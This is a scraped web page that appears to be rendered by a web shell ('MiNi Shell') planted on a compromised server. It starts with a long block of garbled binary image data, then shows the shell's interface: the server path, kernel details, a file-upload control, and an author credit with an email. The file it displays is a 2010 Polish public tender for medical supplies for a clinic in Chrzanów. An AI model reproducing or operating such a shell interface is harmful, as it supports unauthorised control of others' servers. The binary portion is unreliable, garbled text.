JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101203/346971-N-2010.html

<p class="kh_header"><b>Chrzanów: Dostawa drobnego sprzętu medycznego. Zamówienie podzielono na dziewięć części</b><br>
<b>Numer ogłoszenia: 346971 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Lecznictwa Ambulatoryjnego w Chrzanowie , ul. Sokoła 19, 32-500 Chrzanów, woj. małopolskie, tel. 0-32 6240325, faks 0-32 6240310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zla.chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drobnego sprzętu medycznego. Zamówienie podzielono na dziewięć części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.	Opis przedmiotu zamówienia 	Rozmiar 	Wielkość opakowania 	Planowana wiekość zakupu 		
					
						
	Część A					
1.	Strzykawki jednorazowe dwuczęściowe 	2 ml	100szt.	200op.		
2	Strzykawki jednorazowe dwuczęściowe	5 ml	100szt.	400op		
3	Strzykawki jednorazowe dwuczęściowe	10ml	100szt.	200op		
4	Strzykawki jednorazowe do cewnika 	100ml	1 szt.	200szt		
5.	Strzykawki jednorazowedwuczęściowe	20ml	100szt.	25op.		
6.	Strzykawki tuberkulinówki 	1ml	100szt	10op. 		
						
	Część B					
1	Igły jednorazowe importowane	0,4x16	100szt.	40op.		
2	Igły jednorazowe importowane	0,5x25	100szt.	300op.		
3	Igły jednorazowe importowane	0,6x30	100szt.	100op.		
4	Igły jednorazowe importowane	0,7x30	100szt.	150op.		
5	Igły jednorazowe importowane	0,8x40	100szt.	1000op.	
6	Igły jednorazowe importowane 	0,9x40	100szt	200 op.	
7	Igły jednorazowe importowane	1,2x40	100szt	20 op.	
8	Wenflon 22G niebieski, 20G różowy, 18G zielony		1szt.	200szt.	
9	Neo-wenflon		1 szt	60szt	
10	Igły do nakłuć lędzwiowych 	1,2x90	1szt. 	300szt 	
					
	Część C		
1	Termometry lekarskie elektroniczne 		1szt. 	80szt.	
2	Szpatułki drewniane 		100szt.	800op.	
3	Cewniki Foleya 		1szt.	150szt.	
4	Stazy gumowe 		1 szt 	20szt. 	
5	Worek na mocz 		1szt.	100szt	
6	Kieliszki 1x		1 op =70szt. 	100op.	
7	Zestaw do przetaczania (przyrząd do przetaczania krwi)		1 szt. 	100szt	
8	Bańki bezogniowe -12 sztuk 		1komplet = 12 sztuk .	20 kompl. .	
9	Słuchawki lekarskie 		1 szt.	20szt	
10	Aparat do mierzenia ciśnienia zegarowy 		1 szt.	40szt.	
11	Aparat do mierzenia ciśnienia dla dzieci 		1szt.	10szt.	
12	Gruszki Polotzera		1szt	10szt	
13	Wzierniki uszne jednorazowe		10 szt. 	1000szt 	
14	Pasy gumowe do EKG-średnie 		1szt.	20 szt	
15	Elektroda -przyssawka do EKG		1 kompl. 	20 kompl. 	
16	Lampa bakteriobójcza przyścienna pojedyncza moc palników TUW30G30 TSUW-C long life , bez liczników 		1szt.	10szt	
17	Lampa bakteriobójcza  przyścienna podwójna moc palników TUW30G30 TSUW-C long life , bez liczników		1szt.	10szt.	
18	Ostrza wymienne nr 10,11,20,22 		100szt.	40op.	
19	Stazy automatyczne 		1szt. 	50szt. 	
20	Żarówka do mikroskopu BIOLAR 6V 15W		1szt.	30szt. 	
21	Żarówki srebrzanka 12V35W		1szt.	60szt.	
22	Żarówki 12V75W z gwintem bagnetowym do lamp bezcieniowych		1szt.	5szt. 	
23	Żarówki LH58-24V65W typ męski		1szt	20szt	
24	Żarówki do rzutnika okulistycznego XLX64251	6V20W	1szt	50szt 	
25	Żarówki do rzutnika okulistycznego HLX 64250	6V 20W	1szt 	50szt. 	
26	Elektrody EK -S50  WPSG średnica 5 cm do prób wysiłkowych i holterowskich		1szt	12 000szt	
				
	Część D				
1	Taśma do EKG E-30 	50x100	1szt.	30szt	
2	Taśma do EKG       - Ascard A33		1szt.	20szt	
3	Żel do USG 	0,5l	1szt.	200op.	
4	Papier do EEG 16 kanałowy bez nadruku wym. 420x300x2000	2000 kartek 	1op.	50op.	
5	Papier K61 B do drukarki USG 		1 op. 	80op.	
6. 	Żel do EKG	0,5l	1szt.	50szt	
7.	Cytofix 	150ml	1szt	30szt.	
8.	Taśma do EKG E 300 		1szt	10szt	
9.	Taśma EKG Z 215x280mm	215x280mm	1szt	50szt	
10	Taśma do EKG ASCARD MR.RD 	Szer.6cm 	1szt	400szt	
				
	Część E				
1.	Nożyczki proste końcówki ostre/tępe 	 14 cm(+- 10% długości narzedzia)	1 szt.	20szt	
2.	Nożyczki proste końcówki ostre/ostre 	18 cm (+- 10% długości narzedzia)	1szt.	40szt.	
3.	Nożyczki do szwów 	14cm(+/- 10% długości narzedzia)	1szt.	20szt	
4	Nożyczki okulistyczne proste, Iris Standard		1szt.	20szt	
5.	Nożyczki odgięte końcówki ostre/tępe	18 cm(+-10% długości narzedzia)	1szt.	40szt	
6.	Penseta anatomiczne 	16cm 	1szt.	40szt	
7.	Penseta anatomiczna 	18cm 	1 szt.	40szt	
8.	Pean  chrurgiczny  prosty	16cm	1szt.	20szt	
9.	Pean  chirurgiczny  prosty 	18cm	1szt.	20szt	
10	Pean anatomiczny odgięty	16cm	1szt.	20szt	
11	Pean anatomiczny odgięty 	18 cm	1szt.	20szt	
12	Kocher prosty 	16 cm 	1szt.	10szt	
13	Kocher prosty 	18cm	1szt.	10szt	
14	Kocher odgięty  	16 cm	1szt.	10szt	
15	Kocher odgięty 	18cm 	1szt. 	10szt	
16. 	Igły do ciał obcych 		1szt	60szt.	
17.	Wzierniki uszne stalowe różnej wielkości		1szt.	120szt.	
18.	Wzierniki nosowe Hartman róznej wielkości		1szt.	60szt.	
19.	Pensety chirurgiczne 	16cm 	1szt.	40szt. 	
20. 	Lusterka krtaniowe wielkości 20,22,24,26,28 mm		1szt 	300 szt.	
22	Imadła 	16 cm(+- 10% długości narzedzia) 	1szt. 	60szt.	
23.	Trzonki do ostrzy nr 3, 4		1szt.	30szt	
24.	Trzonki do lusterek krtaniowych 		1szt. 	20szt	
25.	Watotrzymacz Briiningsa 		1szt.	10szt	
26.	Kleszczyki do tamponady nosa 		1szt.	50szt.	
27	Szyny Kramera 	Szer.10cm dł. 150 cm	1szt.	100szt	
28.	Szyny Kramera	Szer. 15 cm 	1szt.	100szt.	
29	Szyny palcowe składające się z elementu metalowego i gąbki 	420x20mm	1szt. 	200szt 	
30	Reduktor do butli tlenowej 10 l		1 szt.	2 szt.	
				RAZEM:	
	Część F			
1.	Ustnik plastikowy do spirometru PNEUMO RS	1op=50szt	5 op	
2	Ustnik kątowy do inhalatora PORTA NEB	1szt.	400szt. 	
				
	Część G			
1.	Wzierniki ginekologiczne 1x użytku  	1szt	9 000szt	
2	Cytoszczotki niesterylne Cerver- Brush z tworzywa sztucznego  do pobierania wymazów cytologicznych	50 szt.	150 op.	
				
	Część H 			
1. 	Rękawice lateksowe  rozmiar  S 	100szt	1800 op	
2.	Rękawice lateksowe  rozmiar M 	100szt	100op 	
3.	Rekawice lateksowe  rozmiar L 	100 szt	400op	
4	Rekawice lateksowe rozmiar XS	100szt	300op. 	
5. 	Rekawice winylowe 	100szt 	20op. 	
6	Rękawice chirurgiczne sterylne  - 7.5	50szt	30 op. 	
7	Rękawice lateksowe bezpudrowe XS	100szt 	200op. 	
8	Rękawice lateksowe bezpudrowe S	100 szt	150 op	
				
	Część I		
1	Nici chirurgiczne DERMALON 2-0 z igłą Grubość igły 19mmC-13,3/8 koła ,ostra     .długość nitki 75cm  lub równoważne	1op=36 szt	4op. 	
2.	Nici chirurgiczne DERMALON 3-0 z igłą Grubość igły 19mmC-13,3/8 koła ,ostra     .długość nitki 75cm lub równoważne	1op=36szt	4op.	
3.	Nici chirurgiczne DERMALON 4-0 z igłą Grubość igły 19mmC-13,3/8 koła ,ostra     .długość nitki 75cm lub równoważne	1op=36szt	4 op. 	
4. 	Nici chirurgiczne DERMALON 3-0 z igłą Grubość igły 36mm DS24,3/8 koła ,ostra     .długość nitki 75cm  lub równoważne	1op=36 szt	4op	
5.	Nici chirurgiczne DERMALON 2-0 z igłą Grubość igły 36mm DS24,3/8 koła ,ostra     .długość nitki 75cm  lub równoważne	1op=36 szt	4 op 	
6.	Nici chirurgiczne SAFIL  2-0 z igłą Grubość igły 24mm DS24,3/8 koła ,ostra     .długość nitki 75cm - wchłanialne  lub równoważne 	1op=36szt	2op.	
7.	Nici chirurgiczne SAFIL  3-0 z igłą Grubość igły 24mm DS24,3/8 koła ,ostra     .długość nitki 75cm - wchłanialne  lub równoważne	1op=36szt	2op	
8.	Nici chirurgiczne Dexon 3-0 z igłą Grubość igły 20mm T16 -okrągła     .długość nitki 45cmlub równoważne	1op=36szt	3op.	
9.	Nici chirurgiczne Amifil 3-0 z igłą Grubość igły 22mm HR, 1/2 C ostra   .długość nitki 75cm	1op=36szt	5 op..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy : 
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : 
iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej) 
2.	posiadają  wiedzę i doświadczenie 
3.	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia 
4.	spełniają warunki dotyczące sytuacji ekonomicznej i finansowej
Ocena spełnienia w/w warunków odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiajacy na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzaja wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiajacy na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzaja wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiajacy na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzaja wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiajacy na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzaja wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku odbędzie się na podstawie przedłożonych oświadczeń i dokumentów ,zgodnie z zasadą spełnia/ nie spełnia ( obowiązek bezwzględnego spełnienia warunku).Zamawiajacy na podstawie złożonych wraz z wnioskiem dokumentów będzie badał czy dokumenty te potwierdzaja wymóg spełnienia określonego przez zamawiającego warunku. 
Wszelkie dokumenty składane w formie kserokopii winny być potwierdzone za zgodność z oryginałem przez wykonawcę poprzez naniesienie zapisu :za zgodność z oryginałem, data i podpis osoby upoważnionej .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zla.chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Lecznictwa Ambulatoryjnego
32-500 Chrzanów ul. Sokoła19
tel/fax.(032) 624 03 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2010 godzina 10:00, miejsce: Sekretariat Zakładu Lecznictwa Ambulatoryjnego II piętro 
32-500 Chrzanów ul. Sokoła19 
tel/fax.(032) 624 03 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com